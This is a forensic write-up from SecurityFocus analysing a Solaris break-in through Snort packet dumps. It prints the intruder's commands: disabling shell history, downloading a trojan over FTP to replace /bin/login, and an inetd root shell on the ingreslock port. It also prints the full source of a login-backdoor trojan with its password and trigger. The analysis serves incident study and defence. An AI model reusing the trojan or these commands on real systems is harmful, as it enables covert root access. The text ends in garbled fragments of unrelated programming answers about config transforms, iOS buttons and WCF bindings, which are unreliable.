746d ed|grep.'.-s./tm 0x00e0 702f 7827 7c67 7265 7020 2d76 2067 7265 p/x'|grep.-v.gre 0x00f0 707c 6177 6b20 277b 7072 696e 7420 2432 p|awk.'{print.$2 0x0100 7d27 600a }'`. This packet shows us the commands that were run when the intruder made a raw connection with port 2514/tcp.}'` Obviously, this was an automated command, which was executed once a raw connection was established with the compromised system. We can tell this from the time-stamps on each Snort packet. We know the command was issued at exactly, 14:46:18.398427, as seen in the above packet dump. As evident from the logs, the command was then processed and executed, all in under a single second, at 14:46:18.901413. The packet dumps below explain more: This packet follows the automated command above. 14:46:18.399867 172.16.1.102.6112 > adsl-61-1-160.dab.bellsouth.net.3595: . ack 4180 win 24616 <nop,nop,timestamp 4160216 463988091> (DF) 0x0000 4500 0034 6aa0 4000 3f06 51d0 ac10 0166 E..4j.@.?.Q....f 0x0010 d03d 01a0 17e0 0e0b 5f82 f43f fee0 9c9b .=......_..?.... 0x0020 8010 6028 05dd 0000 0101 080a 003f 7ad8 ..`(.........?z. 0x0030 1ba7 e57b ...{ 14:46:18.400270 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: . ack 209 win 24408 <nop,nop,timestamp 4160216 463988091> (DF) 0x0000 4500 0034 6aa1 4000 3f06 51cf ac10 0166 E..4j.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0117 fff7 80f5 .=......_....... 0x0020 8010 5f58 2617 0000 0101 080a 003f 7ad8 .._X&........?z. 0x0030 1ba7 e57b ...{ 14:46:18.421722 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 1:3(2) ack 209 win 24616 <nop,nop,timestamp 4160218 463988091> (DF) 0x0000 4500 0036 6aa2 4000 3f06 51cc ac10 0166 E..6j.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0117 fff7 80f5 .=......_....... 0x0020 8018 6028 021b 0000 0101 080a 003f 7ada ..`(.........?z. 0x0030 1ba7 e57b 2320 ...{#. 14:46:18.502830 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 3 win 16060 <nop,nop,timestamp 463988109 4160218> (DF) 0x0000 4500 0034 a1ce 4000 3006 29a2 d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 0119 ...f........_... 0x0020 8010 3ebc 469d 0000 0101 080a 1ba7 e58d ..>.F........... 0x0030 003f 7ada .?z. 14:46:18.505611 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 3:98(95) ack 209 win 24616 <nop,nop,timestamp 4160227 463988109> (DF) 0x0000 4500 0093 6aa3 4000 3f06 516e ac10 0166 E...j.@.?.Qn...f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0119 fff7 80f5 .=......_....... 0x0020 8018 6028 2401 0000 0101 080a 003f 7ae3 ..`($........?z. 0x0030 1ba7 e58d 5375 6e4f 5320 6275 7a7a 7920 ....SunOS.buzzy. 0x0040 352e 3820 4765 6e65 7269 635f 3130 3835 5.8.Generic_1085 0x0050 3238 2d30 3320 7375 6e34 7520 7370 6172 28-03.sun4u.spar 0x0060 6320 5355 4e57 2c55 6c74 7261 2d35 5f31 c.SUNW,Ultra-5_1 0x0070 300a 2f63 6f72 653a 204e 6f20 7375 6368 0./core:.No.such 0x0080 2066 696c 6520 6f72 2064 6972 6563 746f .file.or.directo 0x0090 7279 0a ry. 14:46:18.610945 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 98 win 16060 <nop,nop,timestamp 463988120 4160227< (DF) 0x0000 4500 0034 a1cf 4000 3006 29a1 d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 0178 ...f........_..x 0x0020 8010 3ebc 462a 0000 0101 080a 1ba7 e598 ..>.F*.......... 0x0030 003f 7ae3 .?z. 14:46:18.612370 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 98:148(50) ack 209 win 24616 <nop,nop,timestamp 4160237 463988120> (DF) 0x0000 4500 0066 6aa4 4000 3f06 519a ac10 0166 E..fj.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 0178 fff7 80f5 .=......_..x.... 0x0020 8018 6028 83ff 0000 0101 080a 003f 7aed ..`(.........?z. 0x0030 1ba7 e598 2f76 6172 2f64 742f 746d 702f ..../var/dt/tmp/ 0x0040 4454 5350 4344 2e6c 6f67 3a20 4e6f 2073 DTSPCD.log:.No.s 0x0050 7563 6820 6669 6c65 206f 7220 6469 7265 uch.file.or.dire 0x0060 6374 6f72 790a ctory. 14:46:18.710415 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 148 win 16060 (DF) 0x0000 4500 0034 a1d1 4000 3006 299f d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 01aa ...f........_... 0x0020 8010 3ebc 45e4 0000 0101 080a 1ba7 e5a2 ..>.E........... 0x0030 003f 7aed .?z. 14:46:18.801409 172.16.1.102.ingreslock > adsl-61-1-160.dab.bellsouth.net.3596: P 148:164(16) ack 209 win 24616 <nop,nop,timestamp 4160256 463988130> (DF) 0x0000 4500 0044 6aa5 4000 3f06 51bb ac10 0166 E..Dj.@.?.Q....f 0x0010 d03d 01a0 05f4 0e0c 5fbb 01aa fff7 80f5 .=......_....... 0x0020 8018 6028 9c52 0000 0101 080a 003f 7b00 ..`(.R.......?{. 0x0030 1ba7 e5a2 4244 2050 4944 2873 293a 2033 ....BD.PID(s):.3 0x0040 3437 360a 476. 14:46:18.901413 adsl-61-1-160.dab.bellsouth.net.3596 > 172.16.1.102.ingreslock: . ack 164 win 16060 <nop,nop,timestamp 463988149 4160256> (DF) 0x0000 4500 0034 a1d3 4000 3006 299d d03d 01a0 E..4..@.0.)..=.. 0x0010 ac10 0166 0e0c 05f4 fff7 80f5 5fbb 01ba ...f........_... 0x0020 8010 3ebc 45ae 0000 0101 080a 1ba7 e5b5 ..>.E........... 0x0030 003f 7b00 .?{. Executed Comands I have provided only a few of the numerous commands executed by the intruder. The following are some of the manual commands issued within an interactive shell. I can decipher the automated and manual commands due to the session duration as each command is executed. Manual commands were then issued once the automated commands were executed. Each command and reply are shown below: # w 8:47am up 11:24, 0 users, load average: 0.12, 0.04, 0.02 User tty login@ idle JCPU PCPU what # unset HISTFILE # cd /tmp mkdir /usr/lib # mkdir: Failed to make directory "/usr/lib"; File exists # mv /bin/login /usr/lib/libfl.k # ftp 64.224.118.115 ftp ftp: ioctl(TIOCGETP): Invalid argument Password:a@ cd pub binary get sun1 bye Name (64.224.118.115:root): # # ls ps_data sun1 # chmod 555 sun1 # mv sun1 /bin/login FTP Session Analysis The above text in bold was then further broken down using Ethereal Follow TCP Stream option. 220 widcr0004atl2.interland.net FTP server (Version wu-2.6.2(1) Tue Jan 8 07:50:31 EST 2002) ready. USER ftp 331 Guest login ok, send your complete e-mail address as password. PASS a@ 230 Guest login ok, access restrictions apply. CWD pub 250 CWD command successful. TYPE I 200 Type set to I. PORT 172,16,1,102,130,234 200 PORT command successful. RETR sun1 150 Opening BINARY mode data connection for sun1 (90544 bytes). 226 Transfer complete. QUIT 221-You have transferred 90544 bytes in 1 files. 221-Total traffic for this session was 91042 bytes in 1 transfers. 221-Thank you for using the FTP service on widcr0004atl2.interland.net. 221 Goodbye. As we can see, the intruder established an ftp connection to a remote machine and retrieved a file called "sun1". Once the ftp connection was closed, the intruder then modified the file permissions of the sun1 file and renamed it to /bin/login as seen by the session dump above. To take a closer look at this, I again used tcpdump to output all the ftp-port packets into readable format. bash-2.05$ tcpdump -X -r 0108@000-snort.log port ftp-data Judging by the intruder's last commands, it looks like some form of edited /bin/login program, obviously trojaned with a backdoor of some sort. I then decided to take another look at the Snort logs using Ethereal to reproduce the sun1 program, which allowed me to conduct a further analysis on what the program was. Retrieving "sun1" Binary File Using Ethereal's TCP Recovery feature, I opened up the Snort binary file, right clicked on one of the FTP-DATA packets, and selected "TCP Stream" from the Ethereal options. Once complete, I then saved the file under the name of "sun1" in ASCII format. Analyzing the Binary Once I saved the binary, I analyzed the file command by running: -bash-2.05b$ file sun1 sun1: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped We know that the sun1 file was compiled on a SUN Operating System with all extra debugging information removed, which could have been used to aid us in using the strings command, but for what purpose was this binary file retrieved? Let's find out. Also, notice how the file is statically linked. This tells us that this binary doesn't call upon any libraries on the host system and can be run independently: the code is fully mobile from system to system. First, let's give the strings command a try to see what we can pick up. We can do this by issuing the following command at our console. strings -bash-2.05b$ strings sun1 | more We get quite a large output from this command, roughly 1245 lines total. While scrolling through the printable character sequences produced by the strings command, the following lines caught my eye. DISPLAY /usr/lib/libfl.k pirc /bin/sh Going on the above information, I attempted to export pirc into a DISPLAY variable in bash using the following command. -bash-2.05b$ DISPLAY=pirc, running the binary with truss, a system command designed to trace system calls' specified processes or programs. I did not have a Sun box to run the binary file on in order to gather additional information. -bash-2.05b$ DISPLAY=pirc So what did we learn about the binary file? Apparently, the sun1 file is some sort of backdoored login program. When the intruder gained access to the system, he renames the original /bin/login to /usr/lib/libfl.k and replaces it with the sun1 binary. It is hypothesized that the sun1 trojan/wrapper of /bin/login will not log connections using the backdoor password. On checking the recovered file using strings(), we can see that the file is somehow linked to a "/usr/lib/libfl.k" file, the original login program. To me, it seems that the file checks for a specific setting on the DISPLAY variable, in this case, I believe the key to be "pirc", which activates the backdoor and drops the user into a root shell. Otherwise, the program dumps the user at the original login program. I decided to have a quick search for the source code to this binary file, in hopes of retrieving additional information. I went to Packet Storm and conducted a search for "rootkit trojan DISPLAY pirc". The following was the first result that turned up: It seems obvious from the description above that this ulogin.c program is indeed the sun1 binary that was recovered from the Snort logs. The following is the source code from ulogin.c found on Packet Storm. /* * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! * Universal login trojan by Tragedy/Dor * IRC: [Dor]@ircnet * * Login trojan for pretty much any O/S... * Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7 * OSF1/DGUX4.0, * Known not to work on: * SunOS 4.x and 5.4... Seems the only variable passwd to login * on these versions of SunOS is the $TERM... and its passed via * commandline option... should be easy to work round in time * * #define PASSWORD - Set your password here * #define _PATH_LOGIN - This is where you moved the original login to * login to hacked host with... * from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host * */ #include <stdio.h> #if !defined(PASSWORD) #define PASSWORD "j4l0n3n" #endif #if !defined(_PATH_LOGIN) # define _PATH_LOGIN "/bin/login" #endif main (argc, argv, envp) int argc; char **argv, **envp; { char *display = getenv("DISPLAY"); if ( display == NULL ) { execve(_PATH_LOGIN, argv, envp); perror(_PATH_LOGIN); exit(1); } if (!strcmp(display,PASSWORD)) { system("/bin/sh"); exit(1); } execve(_PATH_LOGIN, argv, envp); exit(1); } Final Binary Analysis As we can see in the source code, the attacker is to issue the following commands in order for this backdoor to work correctly. from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host Using this information, we can begin to guess how this backdoor dumps the user at a root shell. Since the backdoor calls on the original "login" program, it's safe to say, if the DISPLAY variable isn't set to the correct parameters, it will pass you back to the original login program specified in the source code of the exploit by the following line. # define _PATH_LOGIN "/bin/login" By looking at the payload from the exploit once the buffer-overflow was successful we can see the command(s) executed by the intruder. Reference: FTP SESSION ANALYSIS "./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i" /tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x" The above command(s) were issued and we saw how the intruder created a root shell running on port 1524 (ingereslock port), using inetd. We can see four (4) different commands being executed within the above command string. If we break them up, we can then decipher which commands did what. ./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x; This command uses the Korn shell to create a file called /tmp/x with a one line entry of an inetd configuration file. The file /tmp/x contained the inetd configuration entry of "ingreslock stream tcp nowait root /bin/sh sh -i". /usr/sbin/inetd -s /tmp/x; It then attempts to start inetd using /tmp/x as its configuration file. sleep 10; This tells the system to stall for 10 seconds to allow the inetd process to restart when being restarted with its new configuration script. /bin/rm -f /tmp/x This command simply removes the /tmp/x file which is being used as the inetd configuration file from the tmp directory once inetd has restarted. Conclusion The need for increased vigilance in learning forensic analysis with and without IDS logs continues to grow. The reality of this industry remains the same, despite the continued changes and advancements in the types of tools hackers will use. The fact remains that Snort and other IDS solutions are currently limited to signature-based detection. If an unknown exploit is used against a network that is being monitored, the only evidence from the crime scene made available are system and application log files. As a result, it is critical to ensure that logs remain sanitized by storing them remotely for follow-up investigations. By monitoring one's system logfiles and utilizing intrusion detection systems such as Snort on both large and small production networks, systems administrators can gain additional coverage and photographs to go back and look at when something occurs. Tools Used Within This Analysis tcpdump - Tcpdump prints out the headers of packets on a network interface that match the boolean expression Ethereal -Ethereal is a GUI network protocol analyzer. It lets you interactively browse packet data from a live network or from a previously saved capture file. File - The file utility conducts three sets of tests; filesystem tests, magic number tests, and language tests printing out the file type. Strings - For each file given, GNU strings prints the printable character sequences that are at least 4 characters long and are followed by an unprintable character. Truss - The truss utility traces the system calls called by the specified process or program. Alan Neville has been involved in information security for the past three years. Director of Ireland Security Information Centre (ISIC), a Fate Research Labs funded centre based in Europe. Alan heads all European operations as well as managing the Ireland honeynet, a project to identify ongoing attacks that threaten the network infrastructure and security posture of Irish-based networks nation-wide. Privacy StatementCopyright 2007, SecurityFocus
http://www.securityfocus.com/infocus/1676
crawl-001
refinedweb
3,842
73.27
ASP.NET web applications (including web services) use threads in a thread pool to process client requests. These threads are created by the .NET framework, they will be reused to process multiple requests. The number of threads in the pool will increase only when the number of simultaneous client requests increases. Typically, you have no control over which thread would be used to process a particular incoming request, your application could have processed thousands of requests from the users, but only one thread did all the work. The other extreme situation is that many requests came in at exactly the same moment so multiple threads have to be used to do the work. Suppose a method in one of your classes is to be executed by threads in the thread pool, a good example is the page_load method of your aspx page class. How do you declare and use an object that is only visible to the current thread? For example, you may want to use an old COM object in this method. This COM object requires some heavy processing at the time of creation and initialization. For performance reasons, you probably don't want to create and initialize this COM object each time your method is called. If you declared the object as a global ( static or shared) variable, then all concurrently running threads would be able to access it. Declaring the object as a non-static class variable may not help because, for example, each time a new request reaches your web application, a new instance of your aspx page class will be used to process the request (even if the same thread in the thread pool is doing the work), therefore you will have to create and initialize your COM object for each user request. There is nothing wrong with sharing an object between different threads if the object is thread-safe or you have added synchronization code so that only one thread can access it at a time (all the other threads will block until the owner thread releases the object). However, if your object is working on a lengthy database transaction, it may not be the best approach to require all the other threads to wait until the operation is completed. In my recent article Using COM objects in multithreaded .NET applications, I presented a solution for this problem. Basically, I provide a utility class that helps you to create (and store) a COM object in the current thread and retrieve it at a later time. This is ideal for .NET applications that use a thread pool like ASP.NET. What I want to do in this article is generalize the idea to any object (it is not restricted to COM object any more). My ObjMan class is contained in the ThreadObjectManager.dll. It is modified from the code in my other article mentioned above. This class has three static (shared) methods, GetObject, SaveObject, and RemoveObject. Here is a description of these methods. GetObject: It takes three parameters, the return type is Object. The first parameter is the name string of the object to be returned. This name string is supplied by the user to differentiate between different objects created within the same thread. The second and the third parameters are optional, they are the class name string and the assembly name string. When this method is called, it will retrieve the object with given name, if it is already created (or saved) within the same thread by a previous call to GetObject(or a call to SaveObject). If no such object can be found and no other parameters are specified, the method will return null(Nothing ). If the class name and the assembly name parameters are specified, the method will use the parameters to load the corresponding assembly and to create an instance of the corresponding class, the newly created object will be saved with the given name string. The object with given name, if found or created, will be returned. SaveObject: This method has two parameters and the return type is bool(Boolean). The first parameter is the name string of the object to be saved. The second parameter is the object itself. If you create an object and call the SaveObjectmethod, passing a name string you choose and the object value, it will save your object for the current thread so that you can retrieve it later by calling the GetObjectmethod from the same thread using the name string. Unlike GetObject, the SaveObjectmethod does not create the object for you, you have to create the object yourself before calling SaveObject. RemoveObject: This method simply removes the object with given name from the current thread. It is not possible to remove an object created (or saved) from a different thread. Please note that a method call such as GetObject("MyObjName") returns different objects if executed from different threads, the object name string only differentiates objects created (or saved) within the same thread. Here is a sample C# code of using the GetObject method to create the COM object described in my other article. You need to register the DummyCom.dll and add it to your .NET project so that the .NET wrapper DLL will be generated. using DUMMYCOMLib; using ThreadObjectManager; ... Object obj = ObjMan.GetObject("MyDummyObj", "DUMMYCOMLib.DummyObjClass", "Interop.DUMMYCOMLib"); String sOutput = ((DummyObjClass)obj).Test("This is a test"); // ObjMan.RemoveObject("MyDummyObj"); ... When the above code is executed, the COM object will be created only once in each thread, unless you uncomment the line that calls RemoveObject. For .NET internal objects, it is easier to combine the SaveObject and the GetObject methods as follows, since there is no need to load any assembly. using ThreadObjectManager; ... Object obj = GetObject("MyHashtable"); if(obj== null) { obj = new Hashtable(); ObjMan.SaveObject("MyHashtable", obj); ((Hashtable)obj).Add("MyString", "This string is added at most once for each thread"); } String sObjName = Guid.NewGuid().ToString(); Hashtable myHashtable = (Hashtable)obj; myHashtable.Add(sObjName, "This string is added every time"); ... Again, the myHashtable object will be created and saved only once for each thread that executes the above code. The implementation of the ObjMan class is simple and straightforward. Internally, the ObjMan class uses a global ( static) H ashTable to store data. Data items in this hashtable are hashtables themselves. Each of these child hashtables corresponds to a thread, the key for the parent hashtable is the thread name. Each thread accesses its own hashtable using the thread name. If a thread has no name, a dynamically generated GUID string will be assigned as its name. When an object is created and saved, it is actually stored in the child hashtable of the current thread. The object name string will be the key for the child hashtable. When an object is retrieved, the code will first find the child hashtable for the current thread, then use the given object name string to find the item stored in the child hashtable. Thank you for reading my article. Please visit my home page for my other articles and tools. General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/threads/threadobjectmanager.aspx
crawl-002
refinedweb
1,181
63.29
Internationalization (also referred to as i18n) is that the method of making or reworking product and services so they’ll simply be tailored to specific native languages and cultures. Localization (also referred to as L10n) is that the method of adapting internationalized computer code for a particular region or language. In alternative words, internationalization is that the method of adapting your computer code to support multiple cultures (currency format, date format, and so on), whereas localization is that the method of implementing one or additional culture. These 2 processes are sometimes adopted by firms that have interests in numerous countries, but they may additionally are available handy for one developer performing on their own web site. as an example, as you may recognize, I’m Italian and that I own a web site. My web site is presented in English however I would arrange to internationalize it then localize it into Italian. this is often useful for people who are native Italian speakers and aren’t well aware of English people language. Developers suppose i18n is regarding translations to non-English languages. That i18n is simply required for increasing the present application to multiple countries or markets. I continuously try and make a case for that i18n is regarding “talking” normally. each application, at some purpose, needs to “talk” to its users. to speak with the users, the applying might need pluralization support, gender inflection, date information, variety information, and currency information. Even in English, it’d be tough to induce this done properly. Globalize and the JavaScript Internationalization API To a number of you, this could come back to a surprise, however, JavaScript has native support for group action within the sort of the group action API (also referred to as ECMA-402). The Intl object is an object available on the window object which acts as a namespace for the Internationalization API. This API presently provides ways to format numbers and dates and to compare strings in a specific language. Now that you know of the existence of the Internationalization API, you could be led into thinking that Globalize uses it behind the scenes. This approach would sure cause a higher date and variety format performance. However, as a result of the support is low and really inconsistent among browsers, the library doesn’t use it. Now I want to give you a taste of the Internationalization API. Formatting a Date Output: 22/3/2019 3/22/2019 22/03/2019 In this example, I use the DateTimeFormat builder to make a replacement date formatter mistreatment the required venue (“it-IT”, “en-US”, and “en-GB”). Then, I invoke the format methodology to format the date object. Formatting a Number Output: 2.153,93 2,153.93 2,153.93 Conclusion In this article, I discussed what internationalization is and why they are important to expand a product’s market. I briefly introduced you to the Internationalization API by mentioning some supported features and then, I showed some examples of their use. Supported Browsers: The browsers supported by internationalization API are listed below: - Google Chrome - Internet Explorer - Firefox - Apple Safari - Opera Recommended Posts: - How does inline JavaScript work with HTML ? - How do Web Servers work? - How order of classes work in CSS ? - How to work with Node.js and JSON file ? - How to work with Julia on Jupyter Notebook? - How HTTP POST request work in node.js ? - How CSS transition work with linear gradient background button? - Amazon summer internship (Hospitality, Work, Learning and Perks) - | Functions in JavaScript - JavaScript Course | Operators in JavaScript - JavaScript Course | Loops in JavaScript - JavaScript Course | Objects in JavaScript - JavaScript Course | JavaScript Prompt.
https://www.geeksforgeeks.org/how-does-internationalization-work-in-javascript/?ref=rp
CC-MAIN-2020-34
refinedweb
608
54.12
Hello Audi, I try to compile using MSVC and I've got the folow error: "fatal error C1070: mismatched #if/#endif pair in file 'c:\temp\temporary workspaces\oxe\dicomtopgm.cpp'" So, there is a "#ifdef" statement in the 1083 line number without its "#endif" counterpart. Best regards. Elizeu Neto Universidade Federal de Alagoas Laboratório de Óptica Quântica e Não Linear ----- Original Message ----- From: Audi To: vtkusers at public.kitware.com Sent: Saturday, February 17, 2001 1:05 PM Subject: [vtkusers] dicom to pgm prog Hi, I found dicomtopgm.cpp in But when I tried to compile it, it gives me weird error, the error said the are mismatch end if but when I check to the line that has been pointed by the error checking is an empty line. I tried to check the program but it seems nothing wrong, but maybe I miss the mistake. So can anybody help me to compile and run the program that I attach here, and inform me whether you can compile successfully. I already tried to email the person who put the source code at that website, but no reply until now. Thanks in advance, Audi -------------- next part -------------- An HTML attachment was scrubbed... URL: <>
https://public.kitware.com/pipermail/vtkusers/2001-March/005837.html
CC-MAIN-2022-27
refinedweb
202
66.88
ACL_DELETE_ENTRY(3) BSD Library Functions Manual ACL_DELETE_ENTRY(3) acl_delete_entry — delete an ACL entry Linux Access Control Lists library (libacl, -lacl). #include <sys/types.h> #include <sys/acl.h> int acl_delete_entry(acl_t acl, acl_entry_t entry_d);. The acl_delete_entry() function returns the value 0 if successful; oth‐ erwise the value -1 is returned and the global variable errno is set to indicate the error. If any of the following conditions occur, the acl_delete_entry() func‐ tion returns -1 and sets errno to the corresponding value: [EINVAL] The argument acl_p is not a valid pointer to an ACL. The argument entry_d is not a valid pointer to an ACL entry. IEEE Std 1003.1e draft 17 (“POSIX.1e”, abandoned) acl_copy_entry(3), acl_create_entry
http://man7.org/linux/man-pages/man3/acl_delete_entry.3.html
CC-MAIN-2017-22
refinedweb
117
59.4
Fetch Data Dynamically Get data from a file or server.Get data from a file or server. What’s the point?What’s the point? - Data on the web is often formatted in JSON. - JSON is text based and human readable. - The dart:convert library provides support for JSON. - Use HttpRequest to dynamically load data. Web applications often use JSON (JavaScript Object Notation) to pass data between clients and servers. Data can be serialized into a JSON string, which is then passed between a client and server, and revived as an object at its destination. This tutorial shows you how to use functions in the dart:convert library to produce and consume JSON data. Because JSON data is typically loaded dynamically, this tutorial also shows how a web app can use an HTTP request to get data from an HTTP server. For web apps, HTTP requests are served by the browser in which the app is running, and thus are subject to the browser’s security restrictions. About JSONAbout JSON The JSON data format is easy for humans to write and read because it is lightweight and text based. With JSON, various data types and simple data structures such as lists and maps can be serialized and represented by strings. Try it! The following app, its_all_about_you, displays the JSON string for data of various types. Click run ( ) to start the app. Then change the values of the input elements, and check out the JSON format for each data type. You might prefer to open the app in DartPad to have more space for the app’s code and UI. The dart:convert library contains two convenient functions for working with JSON strings: To use these functions, you need to import dart:convert into your Dart code: import 'dart:convert'; The JSON.encode() and JSON.decode() functions can handle these Dart types automatically: - num - String - bool - null - List - Map Serializing data into JSONSerializing data into JSON Use the JSON.encode() function to serialize an object that supports JSON. The showJson function, from the its_all_about_you example, converts all of the data to JSON strings. import 'dart:convert'; ... // Display all values as JSON. void showJson(Event e) { // Grab the data that will be converted to JSON. num favNum = int.parse(favoriteNumber.value); num pi = double.parse(valueOfPi.value); bool chocolate = loveChocolate.checked; String sign = horoscope.value; List<String> favoriteThings = [ favOne.value, favTwo.value, favThree.value ]; Map formData = { 'favoriteNumber': favNum, 'valueOfPi': pi, 'chocolate': chocolate, 'horoscope': sign, 'favoriteThings': favoriteThings }; // Convert everything to JSON and display the results. intAsJson.text = JSON.encode(favNum); doubleAsJson.text = JSON.encode(pi); boolAsJson.text = JSON.encode(chocolate); stringAsJson.text = JSON.encode(sign); listAsJson.text = JSON.encode(favoriteThings); mapAsJson.text = JSON.encode(formData);} Below is the JSON string that results from the code using the original values from the its_all_about_you app. Boolean and numeric values appear as they would if they were literal values in code, without quotes or other delineating marks. A boolean value is either true or false. A null object is represented with null. Strings are contained within double quotes. A list is delineated with square brackets; its items are comma-separated. The list in this example contains strings. A map is delineated with curly brackets; it contains comma-separated key/value pairs, where the key appears first, followed by a colon, followed by the value. In this example, the keys in the map are strings. The values in the map vary in type but they are all JSON-parsable. Parsing JSON dataParsing JSON data Use the JSON.decode() function from the dart:convert library to create Dart objects from a JSON string. The its_all_about_you example initially populates the values in the form from this JSON string: String jsonDataAsString = ''' { "favoriteNumber":73, "valueOfPi":3.141592, "chocolate":true, "horoscope":"Cancer", "favoriteThings":["monkeys", "parrots", "lattes"] } '''; Map jsonData = JSON.decode(jsonDataAsString); This code calls the JSON.decode() function with a properly formatted JSON string. Note that Dart strings can use either single or double quotes to denote strings. JSON requires double quotes. In this example, the full JSON string is hard coded into the Dart code, but it could be created by the form itself or read from a static file or received from a server. An example later on this page shows how to dynamically fetch JSON data from a file that is co-located with the code for the app. The JSON.decode() function reads the string and builds Dart objects from it. In this example, the JSON.decode() function creates a Map object based on the information in the JSON string. The Map contains objects of various types including an integer, a double, a boolean value, a regular string, and a list. All of the keys in the map are strings. About URIs and HTTP requestsAbout URIs and HTTP requests To make an HTTP GET request from within a web app, you need to provide a URI (Uniform Resource Identifier) for the resource. A URI (Uniform Resource Identifier) is a character string that uniquely names a resource. A URL (Uniform Resource Locator) is a specific kind of URI that also provides the location of a resource. URLs for resources on the World Wide Web contain three pieces of information: - The protocol used for communication - The hostname of the server - The path to the resource For example, the URL for this page breaks down as follows: This URL specifies the HTTP protocol. At its most basic, when you enter an HTTP address into a web browser, the browser sends an HTTP GET request to a web server, and the web server sends an HTTP response that contains the contents of the page (or an error message). Most HTTP requests in a web browser are simple GET requests asking for the contents of a page. However, the HTTP protocol allows for other types of requests, such as POST for sending data from the client. A Dart web app running inside of a browser can make HTTP requests. These HTTP requests are handled by the browser in which the app is running. Even though the browser itself can make HTTP requests anywhere on the web, a Dart web app running inside the browser can make only limited HTTP requests because of security restrictions. Practically speaking, because of these limitations, HTTP requests from web apps are primarily useful for retrieving information in files specific to and co-located with the app. The SDK provides these useful classes for formulating URIs and making HTTP requests: Using the getString() function to load a fileUsing the getString() function to load a file One useful HTTP request your web app can make is a GET request for a data file served from the same origin as the app. The example below reads a data file called portmanteaux.json that contains a JSON-formatted list of words. When you click the button, the app makes a GET request of the server and loads the file. Try it! Click run ( ) and then click the Get portmanteaux button. This program uses a convenience method, getString(), provided by the HttpRequest class to request the file from the server. The getString() method uses a Future object to handle the request. A Future is a way to perform potentially time-consuming operations, such as HTTP requests, asynchronously. If you haven’t encountered Futures yet, you can learn more about them in Asynchronous Programming: Futures. Until then, you can use the code above as an idiom and provide your own code for the body of the processString() function and your own code to handle the error. Using an HttpRequest object to load a fileUsing an HttpRequest object to load a file The getString() method is good for an HTTP GET request that returns a string loaded from the resource. For different cases, you need to create an HttpRequest object, configure its header and other information, and use the send() method to make the request. This section rewrites the portmanteaux code to explicitly construct an HttpRequest object. Setting up the HttpRequest objectSetting up the HttpRequest object The mouse-click handler for the button creates an HttpRequest object, configures it with a URI and callback function, and then sends the request. Let’s take a look at the Dart code: void makeRequest(Event e) { var path = ''; var httpRequest = new HttpRequest(); httpRequest ..open('GET', path) ..onLoadEnd.listen((e) => requestComplete(httpRequest)) ..send(''); } Sending the requestSending the request The send() method sends the request to the server. httpRequest.send(''); Because the request in this example is a simple GET request, the code can send an empty string. For other types of requests, such as POST requests, this string can contain further details or relevant data. You can also configure the HttpRequest object by setting various header parameters using the setRequestHeader() method. Handling the responseHandling the response To handle the response from the request, you need to set up a callback function before calling send(). Our example sets up a one-line callback function for onLoadEnd events that in turn calls requestComplete(). This callback function is called when the request completes, either successfully or unsuccessfully. The callback function for our example, requestComplete(), checks the status code for the request. If the status code is 200, the file was found and loaded successfully, The contents of the requested file, portmanteaux.json, are returned in the responseText property of an HttpRequest object. Using the JSON.decode() function from the dart:convert library, the code easily converts the JSON-formatted list of words to a Dart list of strings, creates a new LIElement for each one, and adds it to the <ul> element on the page. Populating the UI from JSONPopulating the UI from JSON The data file in the portmanteaux example, portmanteaux.json, contains a JSON-formatted list of strings. [ "portmanteau", "fantabulous", "spork", "smog", "spanglish", "gerrymander", "turducken", "stagflation", "bromance", "freeware", "oxbridge", "palimony", "netiquette", "brunch", "blog", "chortle", "Hassenpfeffer", "Schnitzelbank" ] Upon request, the server reads this data from the file and sends it as a single string to the client program. The client program receives the JSON string and uses JSON.decode() to create the String objects specified by the JSON string. Other resourcesOther resources Check out Chris Buckett’s article, Using Dart with JSON Web Services, for more information and an example with source code for both client and server programs. What next?What next? - If you haven’t yet read Asynchronous Programming: Futures
https://webdev.dartlang.org/tutorials/get-data/fetch-data
CC-MAIN-2018-26
refinedweb
1,731
55.13
Configuration transformation is only done when publishing. Your base configuration file should have your development settings. If you choose to use the default build configurations, normally the release transform file should contain your production environment settings and the debug transform file will contain your test environment settings. Personally, I usually create a new build configuration for testing and for production and leave the debug and release transforms empty. I am testing your code now. It all seems to be working well. But I would definitely call this first: self.navigationItem.hidesBackButton = YES; After you call this then create your new leftBarButtonItem. The full code that I used is below: self.navigationItem.hidesBackButton = YES; self.navigationItem.leftBarButtonItem = [[UIBarButtonItem alloc] initWithTitle:@"Hi" style:UIBarButtonItemStylePlain target:self action:@selector(triggerBackNavigation:)]; I know you're using an image but I just used a button with text to see if it works properly. Probably your custom binding is configured in a way that macthed the WSHttpBinding capabilities. According WCF Binding converter, this is the custom binding that matches ws http default settings: <customBinding> <binding name="NewBinding0"> <transactionFlow /> <security authenticationMode="SecureConversation" 